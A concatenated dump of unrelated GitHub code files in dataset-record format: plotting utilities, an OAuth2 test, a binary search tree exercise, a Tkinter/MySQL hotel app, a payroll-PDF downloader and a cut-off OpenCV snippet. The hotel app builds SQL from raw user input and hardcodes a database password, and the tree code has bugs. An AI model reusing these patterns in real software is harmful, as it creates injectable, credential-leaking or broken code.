Whether to plot the name of each shape at its centroid\n\n Returns\n -------\n collection : PolyCollection\n \"\"\"\n\n if 'outline' in kwds:\n # deprecated\n if kwds.pop('outline'): facecolors = 'none'\n\n if 'colour' in kwds:\n # deprecated\n edgecolors = kwds.pop('colour')\n\n if ax is None:\n ax = plt.gca()\n\n if not isinstance(shapes, pd.Series):\n shapes = pd.Series(shapes)\n\n def flatten_multipolygons(shapes):\n flat_shapes = []\n flat_index = []\n\n for n, sh in shapes.iteritems():\n if isinstance(sh, MultiPolygon):\n flat_shapes += list(sh)\n flat_index += [n] * len(sh)\n else:\n flat_shapes.append(sh)\n flat_index.append(n)\n\n return pd.Series(flat_shapes, index=flat_index)\n\n\n if isinstance(edgecolors, pd.Series):\n shapes = shapes.reindex(edgecolors.index)\n flat_shapes = flatten_multipolygons(shapes)\n edgecolors = edgecolors.reindex(flat_shapes.index)\n elif isinstance(facecolors, pd.Series):\n shapes = shapes.reindex(facecolors.index)\n flat_shapes = flatten_multipolygons(shapes)\n facecolors = facecolors.reindex(flat_shapes.index)\n elif isinstance(data, pd.Series):\n shapes = shapes.reindex(data.index)\n flat_shapes = flatten_multipolygons(shapes)\n data = data.reindex(flat_shapes.index)\n else:\n flat_shapes = flatten_multipolygons(shapes)\n if facecolors is None:\n data = pd.Series(np.arange(len(shapes)), index=shapes.index).reindex(flat_shapes.index)\n\n coll = PolyCollection((np.asarray(x.exterior)\n for x in flat_shapes),\n transOffset=ax.transData,\n facecolors=facecolors,\n edgecolors=edgecolors, **kwds)\n\n if data is not None:\n coll.set_array(data)\n\n if norm is not None:\n coll.set_norm(norm)\n\n ax.add_collection(coll, autolim=True)\n\n if colorbar:\n kwargs = dict()\n if isinstance(colorbar, dict):\n kwargs.update(colorbar)\n\n ## FIXME : sounds like a bug to me, but hey\n #if norm is not None:\n # norm.autoscale(data)\n\n cbar = plt.colorbar(mappable=coll, ax=ax, **kwargs)\n if colorbar_ticklabels is not None:\n cbar.ax.set_yticklabels(colorbar_ticklabels)\n\n if with_labels:\n for k,v in iteritems(shapes.reindex(data.index)):\n x,y = np.asarray(v.centroid)\n ax.text(x, y, k, fontsize=fontsize,\n horizontalalignment='center',\n verticalalignment='center')\n\n ax.autoscale_view()\n return coll\n\n def plot_flow(G, P, F, colorbar=True):\n plt.figure()\n gs = mgridspec.GridSpec(4, 4,\n width_ratios=[3,18,3,1],\n height_ratios=[1,14,1,1]\n )\n ax = plt.subplot(gs[0:3,0:3])\n if colorbar:\n cax1 = plt.subplot(gs[1,3])\n cax2 = plt.subplot(gs[3,1])\n\n ax.set_aspect('equal')\n\n # Nodes\n vmax = abs(P).max()\n pos = {c: np.asarray(sh.centroid) for c, sh in iteritems(shapes)}\n x, y = np.asarray(itemgetter(*nodelist)(pos)).T\n mappable = ax.scatter(x, y, s=45., c=P, cmap='coolwarm', vmin=-vmax, vmax=+vmax)\n draw_countries([np.NaN]*30, facecolors='None', ax=ax, zorder=-3)\n if colorbar:\n plt.colorbar(mappable, cax=cax1).set_label(r'$P_n$ / GW')\n\n # Edges\n cc = mcolors.ColorConverter()\n cmap = mcolors.LinearSegmentedColormap.from_list(\n 'darkblue-alpha',\n [cc.to_rgba('darkblue', alpha=a) for a in (0., 1.)]\n )\n norm = mcolors.Normalize()\n\n lines = []\n arrows = []\n for (u, v), f in zip(edgelist, F):\n if f < 0: u, v = v, u\n x1, y1 = pos[u]\n x2, y2 = pos[v]\n\n lines.append([(x1, y1), (x2, y2)])\n arrows.append(FancyArrow(x1, y1, 0.5*(x2 - x1), 0.5*(y2 - y1), head_width=1.5))\n\n linecol = LineCollection(lines, lw=3., cmap=cmap, zorder=-2, norm=norm)\n linecol.set_array(abs(F))\n ax.add_collection(linecol)\n\n arrowcol = PatchCollection(arrows, cmap=cmap, zorder=-1, norm=norm, edgecolors='none')\n arrowcol.set_array(abs(F))\n ax.add_collection(arrowcol)\n #plt.plot((x1, x2), (y1, y2), color='darkblue', alpha=norm(abs(f)), lw=3., zorder=-2)\n\n plt.colorbar(linecol, cax=cax2, orientation='horizontal').set_label(r'$|F_l|$ / GW')\n\nexcept ImportError:\n pass\n\ntry:\n from mpl_toolkits.basemap import Basemap\n\n def germany(resolution='l', ax=None, meta=None):\n\n if meta is None:\n llcrnrlat = 47\n urcrnrlat = 56\n llcrnrlon = 5.5\n urcrnrlon = 15.5\n else:\n llcrnrlat = meta['latitudes'][-1,0]\n urcrnrlat = meta['latitudes'][0,-1]\n llcrnrlon = meta['longitudes'][-1,0]\n urcrnrlon = meta['longitudes'][0,-1]\n m = Basemap(projection='cyl', resolution=resolution,\n llcrnrlat=llcrnrlat, urcrnrlat=urcrnrlat,\n llcrnrlon=llcrnrlon, urcrnrlon=urcrnrlon,\n ax=ax)\n m.drawcoastlines()\n m.drawcountries()\n return m\n\n def draw_basemap(resolution='l', ax=None, **kwds):\n if ax is None:\n ax = plt.gca()\n m = Basemap(*(tuple(ax.viewLim.min) + tuple(ax.viewLim.max)), resolution=resolution, ax=ax, **kwds)\n m.drawcoastlines()\n m.drawcountries()\n return m\n\nexcept ImportError:\n pass\n\ntry:\n import networkx as nx\n\n def _is_string_like(obj):\n \"\"\"Check if obj is string.\"\"\"\n # 2.x/3.x compatibility\n try:\n basestring\n except NameError:\n basestring = str\n return isinstance(obj, basestring)\n \n def draw_edges(G, segments, pos=None, edgelist=None, width=1.0, color='k',\n style='solid', alpha=None, ax=None, **kwds):\n \"\"\"Draw the edges of the graph G.\n\n This draws the edge segments given by a separation of the links in\n `data` of the graph G.\n\n Parameters\n ----------\n G : graph\n A networkx graph\n\n segments : L x M array\n The segmentation of each link. (segments.sum(axis=1) == 1).all()\n\n pos : dictionary\n A dictionary with nodes as keys and positions as values.\n Positions should be sequences of length 2.\n (default=nx.get_node_attributes(G, 'pos'))\n\n edgelist : collection of edge tuples\n Draw only specified edges(default=G.edges())\n\n width : float or array of floats\n Line width of edges (default =1.0)\n\n color : tuple of color strings\n Edge Segments color. Can be a single color format string (default='r'),\n or a sequence of colors with the same length as data.shape[1].\n\n style : string\n Edge line style (default='solid') (solid|dashed|dotted,dashdot)\n\n alpha : float\n The edge transparency (default=1.0)\n\n ax : Matplotlib Axes object, optional\n Draw the graph in the specified Matplotlib axes.\n\n Returns\n -------\n matplotlib.collection.LineCollection\n `LineCollection` of the edge segments\n\n \"\"\"\n if not np.allclose(segments.sum(axis=1), 1):\n segments = segments / segments.sum(axis=1, keepdims=True)\n\n if ax is None:\n ax = plt.gca()\n\n if pos is None:\n pos = nx.get_node_attributes(G, 'pos')\n\n if edgelist is None:\n edgelist = G.edges()\n\n if not edgelist or len(edgelist) == 0: # no edges!\n return None\n\n if not cb.iterable(width):\n lw = (width,)\n else:\n lw = width\n\n if cb.iterable(color) \\\n and len(color) == segments.shape[1]:\n if np.alltrue([_is_string_like(c) for c in color]):\n # (should check ALL elements)\n # list of color letters such as ['k','r','k',...]\n edge_colors = tuple([colorConverter.to_rgba(c, alpha) for c in color])\n elif (np.alltrue([not _is_string_like(c) for c in color])\n and np.alltrue([cb.iterable(c) and len(c) in (3, 4) for c in color])):\n edge_colors = tuple(color)\n else:\n raise ValueError('color must consist of either color names or numbers')\n else:\n if _is_string_like(color) or len(color) == 1:\n edge_colors = (colorConverter.to_rgba(color, alpha), )\n else:\n raise ValueError('color must be a single color or list of exactly m colors where m is the number of segments')\n\n assert len(edgelist) == segments.shape[0], \"Number edges and segments have to line up\"\n\n # set edge positions\n edge_pos = np.asarray([(pos[e[0]], pos[e[1]]) for e in edgelist])\n\n src = edge_pos[:,0]\n dest = edge_pos[:,1]\n\n positions = src[:,np.newaxis] + np.cumsum(np.hstack((np.zeros((len(segments), 1)), segments)), axis=1)[:,:,np.newaxis]*(dest - src)[:,np.newaxis]\n\n linecolls = []\n for s in range(segments.shape[1]):\n coll = LineCollection(positions[:,s:s+2],\n colors=edge_colors[s:s+1],\n linewidths=lw,\n antialiaseds=(1,),\n linestyle=style,\n transOffset = ax.transData)\n\n coll.set_zorder(1) # edges go behind nodes\n # coll.set_label(label)\n\n if cb.is_numlike(alpha):\n coll.set_alpha(alpha)\n\n ax.add_collection(coll)\n linecolls.append(coll)\n\n # update view\n minx = np.amin(np.ravel(edge_pos[:, :, 0]))\n maxx = np.amax(np.ravel(edge_pos[:, :, 0]))\n miny = np.amin(np.ravel(edge_pos[:, :, 1]))\n maxy = np.amax(np.ravel(edge_pos[:, :, 1]))\n\n w = maxx-minx\n h = maxy-miny\n padx, pady = 0.05*w, 0.05*h\n corners = (minx-padx, miny-pady), (maxx+padx, maxy+pady)\n ax.update_datalim(corners)\n ax.autoscale_view()\n\n return linecolls\nexcept ImportError:\n pass\n","repo_name":"FRESNA/vresutils","sub_path":"vresutils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":13622,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"38162025104","text":"\"\"\"\nIntegration tests for oauth2.py\n\"\"\"\nimport os\n\nfrom ticktick.oauth2 import OAuth2\n\n\ndef test_oauth2_from_environment():\n \"\"\"\n Tests successful validation of access token from environment\n \"\"\"\n client_id = os.getenv('CLIENT_ID')\n client_secret = os.getenv('CLIENT_SECRET')\n redirect_uri = os.getenv('URI')\n\n auth_client = OAuth2(client_id=client_id,\n client_secret=client_secret,\n redirect_uri=redirect_uri,\n env_key=\"ACCESS_TOKEN_DICT\")\n\n assert auth_client.access_token_info[\"access_token\"] == os.getenv('ACCESS_TOKEN')","repo_name":"lazeroffmichael/ticktick-py","sub_path":"tests/integration/test_oauth2.py","file_name":"test_oauth2.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"48"} +{"seq_id":"43039834317","text":"class Node:\n\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n\nclass Tree:\n\n def __init__(self):\n self.root = None\n\n def insert(self,data):\n if self.root is None:\n self.root = Node(data)\n\n else:\n curr = self.root\n while 1:\n if data < curr.data:\n if curr.left is None:\n curr.left = Node(data)\n break\n else:\n curr = curr.left\n elif data > curr.data:\n if curr.right is None:\n curr.right = Node(data)\n break\n else:\n curr = curr.right\n\n # V-L-R\n def preorder(self,x):\n\n if x is not None:\n print(x.data)\n self.preorder(x.left)\n self.preorder(x.right)\n\n # L-V-R\n def inorder(self,x):\n\n if x is not None:\n self.inorder(x.left)\n print(x.data)\n self.inorder(x.right)\n\n # L-R-V\n def postorder(self,x):\n\n if x is not None:\n self.postorder(x.left)\n self.postorder(x.right)\n print(x.data)\n\n def modifiedInorder(self,x,temp):\n\n print(\"We are in modified Inorder\")\n if x is not None:\n self.modifiedInorder(x.left,temp)\n\n print(x.data)\n temp.append(x.data)\n\n self.modifiedInorder(x.right,temp)\n # print(\"List is\", temp)\n return temp\n\n def searchForSuccessor(self, curr):\n temp = []\n z = self.modifiedInorder(self.root,temp)\n # print(z)\n # print(z.index(curr.data))\n y = z[z.index(curr.data) + 1]\n successor = y\n # print(successor)\n self.delete(successor)\n curr.data = successor\n\n\n def delete(self,key):\n\n # first search\n if self.root is None:\n print(\"Not found\")\n curr = self.root\n\n while curr.data != key and curr is not None:\n\n # print(\"Enter\")\n\n parent = curr\n\n if curr is None:\n return (\"Key not present\")\n if curr.data == key:\n print(\"Found\")\n break\n\n elif key < curr.data:\n\n curr = curr.left\n continue\n\n elif key > curr.data:\n\n curr = curr.right\n continue\n # print(curr.data)\n\n # if curr is a leaf node\n if curr.left is None and curr.right is None:\n if curr.data > parent.data:\n parent.right = None\n else:\n parent.left = None\n return\n # break\n\n # if curr has right child only\n elif curr.left is None:\n temp = curr.right.data\n curr.data = temp\n curr.right = None\n # break\n\n # if curr has left child only\n elif curr.right is None:\n temp = curr.left.data\n curr.data = temp\n curr.left = None\n # break\n\n\n\n # when the node to be deleted is a node having both left and right subtree\n # replace the node to be deleted with the inorder successor\n elif curr.left != None and curr.right != None:\n self.searchForSuccessor(curr)\n \n def LevelOrderTraversal(self,x):\n s = queue.Queue()\n s.put(x)\n while s.empty() == False:\n node = s.get()\n print(node.data)\n if node.left != None:\n s.put(node.left)\n if node.right!= None:\n s.put(node.right)\n \n # ZigZag traversal right->left->right...\n def zigzag(self,x):\n #initialize 2 stacks\n s1 = []\n s2 = []\n curr = x\n s1.append(curr)\n while len(s1) != 0 or len(s2) != 0:\n while len(s1) != 0:\n temp = s1.pop()\n if temp.left != None:\n s2.append(temp.left)\n if temp.right != None:\n s2.append(temp.right)\n print(temp.data)\n while len(s2) != 0:\n temp = s2.pop()\n if temp.right != None:\n s1.append(temp.right)\n if temp.left != None:\n s1.append(temp.left)\n print(temp.data)\n \n # Store parent node of each node in a dict\n def getParentNode(self,x):\n q = queue.Queue()\n q.put(x)\n d = {} # initialize a dict\n # d[x] = None\n while q.empty() == False:\n temp = q.get()\n if temp == x:\n d[temp] = None\n if temp.left != None:\n q.put(temp.left)\n d[temp.left] = temp\n if temp.right!= None:\n q.put(temp.right)\n d[temp.right] = temp\n return d\n\n # Print all nodes at distance k from a given node\n def allNodesAtDistanceK(self,target,k):\n start = self.search(target)\n\n parent_map = self.getParentNode(self.root)\n\n q = queue.Queue()\n seen_dict = {}\n seen_dict[start] = 1\n q.put(start)\n level = 0\n while q.empty() == False:\n if level == k:\n for i in range(q.qsize()):\n print(\"Nodes at distance K are:\", q.get().data)\n break\n x = q.qsize()\n i = 0\n while i < x:\n temp = q.get()\n\n print(temp.data)\n if temp.left != None:\n # q.put(temp.left)\n if temp.left not in seen_dict:\n q.put(temp.left)\n seen_dict[temp.left] = 1\n # seen_dict[temp.left] = 1\n if temp.right!= None:\n # q.put(temp.right)\n if temp.right not in seen_dict:\n q.put(temp.right)\n seen_dict[temp.right] = 1\n # seen_dict[temp.right] = 1\n if parent_map[temp] != None:\n if parent_map[temp] not in seen_dict:\n q.put(parent_map[temp])\n i = i + 1\n level = level + 1\n\n # searching for a node\n def search(self,key):\n\n if self.root is None:\n print(\"Not found\")\n\n curr = self.root\n\n\n while 1:\n if curr is None:\n print(\"Key not present\")\n break\n if curr.data == key:\n print(\"Found\")\n break\n elif key < curr.data:\n curr = curr.left\n elif key > curr.data:\n curr = curr.right\n\n # calculates height based in the number of nodes.\n # to calculate height based on the number of edges, return -1 is curr is None\n def heightOfBianrytree(self,x):\n\n curr = x\n if curr is None:\n return 0\n\n lheight = self.heightOfBianrytree(curr.left)\n rheight = self.heightOfBianrytree(curr.right)\n return max(lheight,rheight) + 1\n\n\n\ntree = Tree()\n# arr = [8,3,1,6,4,7,10,14,13]\n\n# arr = [4, 2, 5, 1, 3]\n# arr = [4, 2, 5, 1, 3]\narr = [15,5,8,6,24,19,30,21,9]\n\nfor i in arr:\n tree.insert(i)\n\n# print(\"Printing preorder\")\n# tree.preorder(tree.root)\n#\n# print(\"Printing postorder\")\n# tree.postorder(tree.root)\n#\nprint(\"Printing inorder\")\ntree.inorder(tree.root)\n#\n# print(\"search\")\n# tree.search(6)\n#\n# print(\"Height of the tree\")\n# print(tree.heightOfBianrytree(tree.root))\n\nprint(\"Deleting a node\")\ntree.delete(15)\n\ntree.inorder(tree.root)\n\nprint(\"Level Order Traversal\")\ntree.LevelOrderTraversal(tree.root)\n\nprint(\"ZigZag Traversal\")\ntree.zigzag(tree.root)\n\n# tree.search(3)\n# tree.delete(3)\n\n# print(\"Get Parent node\")\n# tree.getParentNode(tree.root)\n\nprint(\"All nodes at distance k\")\ntree.allNodesAtDistanceK(5,2)\n\n\n# References:\n# https://www.geeksforgeeks.org/how-to-handle-duplicates-in-binary-search-tree/\n# https://stackoverflow.com/questions/300935/are-duplicate-keys-allowed-in-the-definition-of-binary-search-trees\n# https://gist.github.com/samidhtalsania/6659380\n# https://www.youtube.com/watch?v=ZM-sV9zQPEs&t=519s\n# https://docs.python.org/3/library/asyncio-queue.html\n# https://www.youtube.com/watch?v=vjt5Y6-1KsQ\n# https://www.youtube.com/watch?v=nPtARJ2cYrg\n","repo_name":"harshdev93/DataStructures-Python","sub_path":"BinaryTrees/BinarySearchTreeOperations.py","file_name":"BinarySearchTreeOperations.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24181581246","text":"from tkinter import *\nimport tkinter.font as tkFont\nimport pymysql\nimport tkinter.messagebox as box\nroot = Tk()\nroot.title('Login Page')\nroot.geometry('600x600')\nroot['bg'] = '#bed2ed'\nconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\ncur = conn.cursor()\n# cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS details\n# (Name CHAR(15) NOT NULL,\n# RollNO CHAR(10) NOT NULL,\n# Class CHAR(10) NOT NULL,\n# ID CHAR(10) NOT NULL,\n# EMail CHAR(100) NOT NULL,\n# MobileNo CHAR(50) NOT NULL)\"\"\")\nfontStylem = tkFont.Font(family=\"Algerian\", size=40)\nwlcm = Label(root, text = \"Welcome\\n To\\n Golden Finger\", font = fontStylem, bg='#bed2ed')\nwlcm.place(x=80,y=20)\n# fontStyle = tkFont.Font(family=\"Calibri\", size=15)\n# sel = Label(root, text = \"Please select the type of room\", font = fontStyle, bg='#bed2ed')\n# sel.grid(row = 5, column = 10)\n\n# Create a Tkinter variable\n# tkvar = StringVar(root)\n\n# # Dictionary with options\n# choices = { 'Pizza','Lasagne','Fries','Fish','Potatoennnnnnnnnnnnnnnnnnnnn'}\n# tkvar.set('Pizza') # set the default option\n\n# popupMenu = OptionMenu(root, tkvar, *choices)\n\n# popupMenu.grid(row = 30, column=10, columnspan=2, pady=10, padx=10, ipadx=135)\n# # on change dropdown value\n# def change_dropdown(*args):\n# print( tkvar.get() )\n\n# #link function to change dropdown\n# tkvar.trace('w', change_dropdown)\n\ndef proceed_br():\n\n\th_city = hce.get()\n\tr_no = rne.get()\n\tpbr = Tk()\n\tpbr.title('book room')\n\tpbr.geometry('600x600')\n\tpbr['bg'] = '#bed2ed'\n\n\tconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT count(*) from cust_hist where room_no = \" +str(r_no)+\" and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+h_city+\"')\")\n\tnm =[ naam[0] for naam in cur.fetchall()]\n\tlb1 = Label(pbr, text = \"Total times booked: \"+str(nm[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb1.place(x=150,y=50)\n\n\ndef proceed_fr():\n\thname = hne.get()\n\trtype = rte.get()\n\tpfr = Tk()\n\tpfr.title('book room')\n\tpfr.geometry('600x600')\n\tpfr['bg'] = '#bed2ed'\n\t\n\tconn = pymysql.connect(\"localhost\", \"root\", \"mumbai@2019\", \"dbmsp\")\n\tcur=conn.cursor()\n\tcur.execute(\"SELECT count(room_no) from rooms where room_type = '\" +rtype+\"' and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+hname+\"')\")\n\tnm =[ naam[0] for naam in cur.fetchall()]\n\tlb1 = Label(pfr, text = \"Total: \"+str(nm[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb1.place(x=150,y=50)\n\n\tcur.execute(\"SELECT count(room_no) from rooms where is_available = 'y' and room_type = '\" +rtype+\"' and hotel_id in (SELECT hotel_id FROM hotel where hotel_city = '\"+hname+\"')\")\n\tnm1 =[ naam[0] for naam in cur.fetchall()]\n\tlb2 = Label(pfr, text = \"Available: \"+str(nm1[0]),font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\tlb2.place(x=150,y=90)\n\n\tconn.commit()\n\tconn.close() \n\n\ndef findroom():\n\tglobal hne, rte\n\tfr = Tk()\n\tfr.title('find room')\n\tfr.geometry('600x600')\n\tfr['bg'] = '#bed2ed'\n\n\thn = Label(fr, text = \"Enter the Hotel Name\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\thn.place(x=150,y=50)\n\thne = Entry(fr,width=25,font=(\"arial\", 20))\n\thne.place(x=100,y=100)\n\n\trt = Label(fr, text = \"Enter the Room Type\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\trt.place(x=150,y=200)\n\trte = Entry(fr,width=25,font=(\"arial\", 20))\n\trte.place(x=100,y=250)\n\n\tpr_btn = Button (fr, text = \"Proceed\", font=(\"arial\", 20, \"bold\"), command = proceed_fr)\n\tpr_btn.place(x=200, y=380, width = 200 )\n\n\n\n\ndef bookroom():\n\t\n\tglobal hce, rne\n\tbr = Tk()\n\tbr.title('book room')\n\tbr.geometry('600x600')\n\tbr['bg'] = '#bed2ed'\n\n\thn = Label(br, text = \"Enter the Hotel Name\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\thn.place(x=150,y=50)\n\thce = Entry(br,width=25,font=(\"arial\", 20))\n\thce.place(x=100,y=100)\n\n\trn = Label(br, text = \"Enter the Room Number\",font=(\"arial\", 20, \"bold\"), bg='#bed2ed')\n\trn.place(x=150,y=200)\n\trne = Entry(br,width=25,font=(\"arial\", 20))\n\trne.place(x=100,y=250)\n\n\tpr_btn = Button (br, text = \"Proceed\", font=(\"arial\", 20, \"bold\"), command = proceed_br)\n\tpr_btn.place(x=200, y=380, width = 200 )\n\n\n\n\n\n\t\n\n\nfr_btn = Button (root, text = \"find room\", font=(\"arial\", 20, \"bold\"), command = findroom)\nfr_btn.place(x=200, y=270, width = 200 )\n\nrb_btn = Button(root, text=\"room book\", font=(\"arial\", 20, \"bold\"), command = bookroom)\nrb_btn.place(x=200, y=350, width = 200 )\n\n\n\n# fontStyles = tkFont.Font(family=\"Calibri\", size=15)\n# sel = Label(root, text = \"Please enter the room number\", font = fontStyle, bg='#bed2ed')\n# sel.grid(row = 40, column = 10)\n\n# name = Entry(width=30)\n# name.place(x=0,y=200)\nconn.commit()\nconn.close()\nroot.mainloop() ","repo_name":"daghariddhi/dbms","sub_path":"dbmsp.py","file_name":"dbmsp.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16635004135","text":"#!/usr/bin/env python\nimport logging\nimport os\nimport gettext\nimport argparse\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\n\nVERSION = '1.0.0'\n\n\ndef setup_argparse():\n locale_dir = os.path.join(os.path.dirname(__file__), \"locale\")\n argparse_ptbr_translation = gettext.translation(\n 'argparse', localedir=locale_dir, languages=['pt_BR'])\n\n # Substitui métodos nativos do argparse com tradução em pt_BR\n # pyright: reportGeneralTypeIssues=none\n argparse.gettext = argparse_ptbr_translation.gettext\n argparse.ngettext = argparse_ptbr_translation.ngettext\n argparse._ = argparse.gettext\n\n parser = argparse.ArgumentParser(\n description=f'Download PDFs do e-folha - v{VERSION}')\n parser.add_argument('-d', '--debug', action='store_true',\n help='Mostra mensagens de debug')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Aumenta a verbosidade')\n parser.add_argument('cliente', type=int,\n choices=[50, 21], help='ID do cliente no e-folha (50=ALESP ou 21=TJ)')\n parser.add_argument('matricula', type=int, help='Matrícula do funcionário')\n parser.add_argument('senha', type=str, help='Senha do funcionário')\n parser.add_argument('-o', dest='output', type=str, default='./saida',\n help='Caminho para salvar os arquivos (Padrão: ./saida) ')\n return parser\n\n\ndef main():\n if (sys.argv[0].endswith('main.py')):\n logging.critical(\n 'Please run this script from \\'efolha-cli\\' from root folder')\n exit(1)\n parser = setup_argparse()\n args = parser.parse_args()\n log = logging.getLogger()\n logging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n if args.debug:\n log.setLevel(logging.DEBUG)\n log.debug(args)\n elif args.verbose:\n log.setLevel(logging.INFO)\n else:\n log.setLevel(logging.WARNING)\n\n session, response = get_html_folhas(args, log)\n\n all_links = extrai_links(log, response)\n\n download_arquivos(args, log, session, all_links)\n\n\ndef download_arquivos(args, log, session, all_links):\n log.info('Salvando arquivos em: ' + args.output)\n for link in all_links:\n tipo, sequencia, mesref, anoref, str_target = link['onclick'].replace(\n 'Atualiza(', '').replace(');', '').replace('\\'', '').split(',')\n\n local_filename = os.path.realpath(f'{args.output}/{args.matricula}/{anoref}/'\n f'{anoref}-{mesref}-{tipo}-{sequencia}-{args.matricula}.pdf')\n log.debug(local_filename)\n if not os.path.exists(os.path.dirname(local_filename)):\n os.makedirs(os.path.dirname(local_filename), exist_ok=True)\n\n if not os.path.exists(local_filename):\n log.info('Baixando folha %s-%s-%s', anoref, mesref, sequencia)\n response = session.post(\n 'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/DemPagtoP.asp',\n data={\n 'Tipo': tipo,\n 'sequencia': sequencia,\n 'mesref': mesref,\n 'anoref': anoref,\n 'strTarget': str_target\n }, stream=True)\n with open(local_filename, 'wb') as output_pdf:\n for chunk in response.iter_content(chunk_size=8192):\n output_pdf.write(chunk)\n else:\n log.warning('Arquivo %s já existe', local_filename)\n\n\ndef extrai_links(log, response):\n soup = BeautifulSoup(response.text, 'html5lib')\n all_links = soup.find_all('img', {'alt': 'pdf', 'onclick': True})\n log.debug(all_links)\n return all_links\n\n\ndef get_html_folhas(args, log):\n session = requests.Session()\n log.debug('Pegando cookie')\n response = session.get(f'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/entrada.asp?'\n f'cliente={str(args.cliente).zfill(3)}')\n log.debug(response.cookies)\n\n log.debug('Fazendo login')\n response = session.post('https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/PesqSenha.asp',\n data={\n 'txtMatricula': str(args.matricula).zfill(6),\n 'txtSenha': args.senha,\n 'txtNPA': '000000000',\n 'btOK': 'ENTRAR'\n })\n log.debug(response.status_code)\n\n log.debug('Listando folhas')\n response = session.post(\n 'https://www.e-folha.prodesp.sp.gov.br/desc_dempagto/Folhas.asp')\n\n return session, response\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fcrespo82/efolhadownloader","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16555116522","text":"\"\"\"\n# 박수박수박수박수박수?\n* 문제 설명\n길이가 n이고, \"수박수박수박수....\"와 같은 패턴을 유지하는 문자열을 리턴하는 함수, solution을 완성하세요. 예를들어 n이 4이면 \"수박수박\"을 리턴하고 3이라면 \"수박수\"를 리턴하면 됩니다.\n\n* 제한 조건\nn은 길이 10,000이하인 자연수입니다.\n\"\"\"\n# 입출력 예\n# +---------------+\n# | n | return |\n# |---|-----------|\n# | 3 | \"수박수\" |\n# | 4 | \"수박수박\" |\n# +---------------+\n\ndef solution(n):\n answer = ''\n\n for i in range(1, n + 1): # i가 1부터 n + 1값 까지 for 문을 돌린다.\n if i % 2 == 1: # 만약 i / 2의 나머지가 1이라면\n answer += '수' # answer 문자열에 '수'를 넣는다.\n else: # 그렇지 않다면\n answer += '박' # answer 문자열에 '박'을 넣는다.\n\n return answer # answer 문자열을 return 해준다.","repo_name":"Junhong0209/Coding-test","sub_path":"Programers/연습문제/수박수박수박수박수박수.py","file_name":"수박수박수박수박수박수.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669588234","text":"from django.conf.urls import include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nimport hello.views\n\n# Examples:\n# url(r'^$', 'gettingstarted.views.home', name='home'),\n# url(r'^blog/', include('blog.urls')),\n\nurlpatterns = [\n url(r'^$', hello.views.index, name='index'),\n url(r'^trees$', hello.views.googlemapstrees, name='trees'),\n url(r'^cars$', hello.views.cars, name='cars'),\n url(r'^carsandtrees$', hello.views.carsandtrees, name='carsandtrees'),\n url(r'^houses$', hello.views.houses, name='houses'),\n url(r'^united$', hello.views.united, name='united'),\n url(r'^leaflet$', hello.views.leaflet, name='leaflet'),\n url(r'^dataset$', hello.views.titanic_json, name='dataset'),\n url(r'^trees_json$', hello.views.trees_json, name='trees_json'),\n url(r'^cars_json$', hello.views.cars_json, name='cars_json'),\n url(r'^houses_json$', hello.views.houses_json, name='houses_json'),\n url(r'^roads_json$', hello.views.roads_json, name='roads_json'),\n url(r'^admin/', include(admin.site.urls)),\n]\n","repo_name":"proggeo/django-titanic-a3","sub_path":"gettingstarted/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987572820","text":"def Deposit():\n Dep = int(input(\"Input start deposit: \"))\n Term = int(input(\"Input term in yers: \"))\n Percent = int(input(\"Input percent: \"))\n if Term > 5:\n print(\"Maximum term is 5 years. Input correct term\")\n elif Term <= 0:\n print(\"Input correct term\")\n elif Dep < 0:\n print(\"The deposit cannot be nagative.Input correct deposit\")\n else:\n Term = Term*12\n i = 0\n while i < Term: \n Dep = round(Dep+Dep*Percent/(12*100), 2)\n i += 1\n print(\"Number of months: \",i,\", deposit: \", Dep, \"BYN\")\n return Deposit\nDeposit()","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Kaplunou/Task1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"44088568545","text":"import cv2\nimport numpy as np\n\n\nif __name__ == \"__main__\":\n print(\"Running...\")\n \n # init.\n imgSize = np.array([500,500], np.int32) # width, height\n center = np.array([250,250], np.float16) # x, y\n size = np.array([100, 200], np.float16) # width, height (major, minor)\n dreg = 